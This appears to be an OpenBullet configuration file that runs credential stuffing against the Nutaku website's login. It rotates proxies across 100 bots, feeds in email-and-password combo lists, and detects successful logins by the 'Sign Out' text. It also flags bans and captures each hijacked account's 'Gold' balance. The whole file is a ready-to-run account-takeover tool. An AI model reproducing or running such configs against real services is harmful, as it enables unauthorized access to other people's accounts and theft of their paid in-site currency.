[SETTINGS]
{
  "Name": "Nutaku",
  "SuggestedBots": 100,
  "LastModified": "2018-05-09T01:08:32.0292654+00:00",
  "AdditionalInfo": "Hentai",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_MAIN_PAGE REQUEST GET "https://www.nutaku.net/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_PAGE PARSE "<SOURCE>" CSS "[name=page]" "value" 0 -> VAR "PAGE" "" "" 
#LOGIN REQUEST POST "https://www.nutaku.net/login/failed/" AutoRedirect=TRUE 
  CONTENT "mailAddress=<USER>&password=<PASS>&autoLogin=0&autoLogin=1&page=<PAGE>&url=&scheme=&appId=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "origin: https://www.nutaku.net" 
  HEADER "referer: https://www.nutaku.net/login/" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Please enter a password between 6 and 16 characters" 
    KEY "login failed" 
  KEYCHAIN Ban OR 
    KEY "Invalid value of shown text" 
  KEYCHAIN Success OR 
    KEY ">Sign Out<" 
#CAPTURE_GOLD PARSE "<SOURCE>" LR "class=\"gold-count\"><span class=\"gold-icon\"></span><span>" "<" Recursive=FALSE -> CAP "Gold" "" "" 
